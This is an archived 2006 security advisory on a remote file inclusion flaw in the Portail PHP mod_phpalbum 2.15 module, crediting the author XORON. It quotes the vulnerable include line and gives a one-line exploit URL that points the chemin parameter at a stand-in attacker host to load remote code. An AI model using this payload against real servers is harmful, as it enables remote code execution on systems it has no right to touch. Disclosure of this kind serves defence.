Portail PHP mod_phpalbum 2.15 Modules Remote File Inclusion

2006-08-30T00:00:00
ID SECURITYVULNS:DOC:14083
Type securityvulns
Reporter Securityvulns
Modified 2006-08-30T00:00:00

Description

Portail PHP mod_phpalbum 2.15 Modules Remote File Inclusion

Vulnerabilities

Author: XORON

Class: Remote

cont@ct: x0r0n[at]hotmail[dot]com

Code: include_once ($chemin."conf/code.php")

Exploit:

http://www.site.com/[path]/mod_phpalbum/sommaire_admin.php?chemin=http://evil_scripts?

Greetz: str0ke, Ironfist, Preddy, SHiKaA

orj. adv: http://www.milw0rm.com/exploits/2271